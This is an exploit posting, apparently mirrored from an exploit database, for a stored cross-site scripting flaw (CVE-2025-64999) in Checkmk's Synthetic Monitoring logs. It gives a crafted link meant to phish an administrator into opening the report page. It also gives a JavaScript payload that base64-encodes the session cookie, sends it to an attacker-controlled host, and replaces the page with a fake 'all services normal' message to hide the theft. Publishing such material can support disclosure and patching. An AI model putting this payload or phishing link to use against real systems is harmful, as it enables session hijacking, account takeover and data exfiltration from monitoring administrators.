Share
## https://sploitus.com/exploit?id=PACKETSTORM:216391
=============================================================================================================================================
    | # Title     : Checkmk ≀ 2.4.0p21 / ≀ 2.3.0p42 Synthetic Monitoring Logs – Stored XSS                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://checkmk.com                                                                                                         |
    =============================================================================================================================================
    
    [+] Summary    :  CVE-2025-64999 A vulnerability due to improper neutralization of user-controlled input affects Checkmk versions:
    
    2.4.0 before 2.4.0p22
    
    2.3.0 before 2.3.0p43
    
    The issue allows an attacker who can manipulate a host’s check output to inject malicious JavaScript into the Synthetic Monitoring HTML logs. When a victim accesses these logs β€” potentially via a crafted phishing link β€” the injected script executes in the context of the authenticated Checkmk session.
    
    Successful exploitation may result in:
    
    Session hijacking
    
    Account takeover
    
    Unauthorized actions within the Checkmk interface
    
    Data exfiltration
    
    The vulnerability is classified as Stored Cross-Site Scripting (Stored XSS) because the malicious payload is stored within monitoring logs and executed when viewed.
    
    [+] POC   :  
    
    Link Crafting
    
    The attacker creates a seemingly legitimate and legitimate link to trick the system administrator into clicking it:
    
    https://<CHKMK_URL>/<SITE>/check_mk/robotmk_suite_report.py?site=<SITE>&host=<TARGET_HOST>&service=<SERVICE_NAME>&log_type=ok
    
    Once the administrator (with an active session) clicks the link, the "unprotected" reports page loads.
    
    The browser reads the injected JavaScript code and executes it immediately with administrator privileges.
    
    <script>
    
        var xhr = new XMLHttpRequest();
        var sensitiveData = btoa(document.cookie); 
        xhr.open("GET", "https://attacker-controlled-site.com/log?data=" + sensitiveData, true);
        xhr.send();
        document.body.innerHTML = "<h1>System Check: OK</h1><p>All services are running normally.</p>";
    </script>
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================